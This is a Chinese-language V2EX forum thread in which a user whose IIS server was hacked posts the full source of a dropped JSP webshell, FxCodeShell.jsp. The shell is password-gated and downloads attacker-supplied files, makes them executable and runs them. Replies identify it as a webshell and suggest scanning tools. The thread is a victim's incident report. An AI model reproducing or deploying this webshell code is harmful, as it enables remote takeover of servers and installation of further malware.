V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
sunbing
V2EX  ›  信息安全

服务器被入侵了,留下一段文本

  •  1
     
  •   sunbing · 2019-03-13 19:06:25 +08:00 · 5197 次点击
    这是一个创建于 2100 天前的主题,其中的信息可能已经有所发展或是发生改变。

    刚才发现服务器被黑了,在 IIS 目录下多了几个文件

    其中一个名为 9082addcc2ac2e12.txt 内容是 vulnerability_id:5c10a762f567dc26567d8b0b

    令一个是 FxCodeShell.jsp 内容是

    <%@ page import="java.util.Arrays"%> <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@ page import="java.io.,java.util.,java.net.URL,java.net.HttpURLConnection"%> <% String view = request.getParameter("view"); if (view == null || view.equals("")) { String localOS = System.getProperty("os.name"); List<string> osList; String tomcatOS = "0"; String DEFAULT = "0"; String WINDOWS = "1"; String LINUX = "2"; osList = new ArrayList<string>(); osList.add("Linux"); osList.add("Windows"); for (String os : osList) { if (localOS.contains(os)) { if (os.equals("Linux")) { tomcatOS = LINUX; } else if (os.equals("Windows")) { tomcatOS = WINDOWS; } else { tomcatOS = DEFAULT; } break; } } out.write(tomcatOS + "
    "); response.setHeader("OS", tomcatOS); return; } %></string></string>

    <% String password = "FxxkMyLie1836710Aa"; if (!view.equals(password)) { return; } int systemCode = Integer.parseInt(request.getParameter("os")); String address = request.getParameter("address"); String fileName = null; String path = null; String winPath = "C:/Windows/Temp/"; String linuxPath = "/var/tmp/"; switch (systemCode) { case 1: path = winPath; break; default: path = linuxPath; break; }

    String[] urls = address.split(",");
    InputStream fileInputSteam = null;
    FileOutputStream fileOutputStream = null;
    for (int i = 0; i <= urls.length - 1; i++) {
    	try {
    		String[] file = urls[i].split("/");
    		fileName = file[file.length - 1];
    		out.write("Download:" + urls[i] + "<br>");
    		out.write("<br>filename:" + fileName + "<br>");
    		out.write("<br>Size:" + urls.length + "<br>");
    		out.write(
    				"-------------------------------------------------------------------------------------------------------"
    						+ "<br><br>");
    		File isfile = new File(path + fileName);
    		if (isfile.isFile()) {
    			try {
    				Runtime exec = Runtime.getRuntime();
    				if (systemCode == 1) {
    					exec.exec(path + fileName);
    				} else {
    					String chmod = "chmod 777 " + path + fileName;
    					exec.exec(chmod);
    					exec.exec("nohup " + path + fileName + " > /dev/null 2>&1 &");
    				}
    			} catch (Exception e1) {
    				e1.printStackTrace();
    			}
    			continue;
    		}
    		URL downloadUrl = new URL(urls[i]);
    		HttpURLConnection conn = (HttpURLConnection) downloadUrl.openConnection();
    		conn.setConnectTimeout(60000 * 3);
    		conn.setReadTimeout(60000 * 3);
    		fileInputSteam = conn.getInputStream();
    		fileOutputStream = new FileOutputStream(path + fileName);
    		int length = -1;
    		byte[] b = new byte[409600];
    		while ((length = fileInputSteam.read(b)) != -1) {
    			fileOutputStream.write(b, 0, length);
    			fileOutputStream.flush();
    		}
    		if (conn != null) {
    			conn.disconnect();
    		}
    		if (fileInputSteam != null) {
    			fileInputSteam.close();
    		}
    		if (fileOutputStream != null) {
    			fileOutputStream.close();
    		}
    		Runtime exec = Runtime.getRuntime();
    		if (systemCode == 1) {
    			exec.exec(path + fileName);
    		} else {
    			String chmod = "chmod 777 " + path + fileName;
    			exec.exec(chmod);
    			exec.exec("nohup " + path + fileName + " > /dev/null 2>&1 &");
    		}
    	} catch (Exception e2) {
    		e2.printStackTrace();
    	}
    }
    

    %>

    10 条回复    2019-03-15 09:03:47 +08:00
    sunbing
        1
    sunbing  
    OP
       2019-03-13 19:09:20 +08:00
    Windows service 2003
    11232as
        2
    11232as  
       2019-03-13 19:11:20 +08:00 via Android
    "FxxkMyLie"是个嘛…
    shiny
        3
    shiny  
       2019-03-13 19:12:18 +08:00
    Webshell
    sunbing
        4
    sunbing  
    OP
       2019-03-13 19:17:11 +08:00
    多了很多远程进程,多了个用户,不知道有没有其他后门
    mmdsun
        5
    mmdsun  
       2019-03-13 19:26:24 +08:00 via Android
    厉害了。黑客还会 java
    xiaomimei
        6
    xiaomimei  
       2019-03-13 19:50:24 +08:00 via Android   ❤️ 1
    像是大马,看代码里写连接密码是 FxxkMyLie1836710Aa,改一下文件等他下次上马,试试能不能溯源😂
    sunbing
        7
    sunbing  
    OP
       2019-03-13 20:50:44 +08:00
    @xiaomimei 你这个有点狠
    1nclude
        8
    1nclude  
       2019-03-14 16:44:10 +08:00
    查杀下 webshell,找下漏洞在哪
    sunbing
        9
    sunbing  
    OP
       2019-03-14 23:41:01 +08:00 via Android
    @1nclude 用杀毒软件不起作用,有啥查杀办法嘛
    1nclude
        10
    1nclude  
       2019-03-15 09:03:47 +08:00
    http://www.d99net.net/News.asp?id=62
    用下 d 盾,最重要的是找出怎么被入侵的呀
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2946 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 81ms · UTC 11:31 · PVG 19:31 · LAX 03:31 · JFK 06:31
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.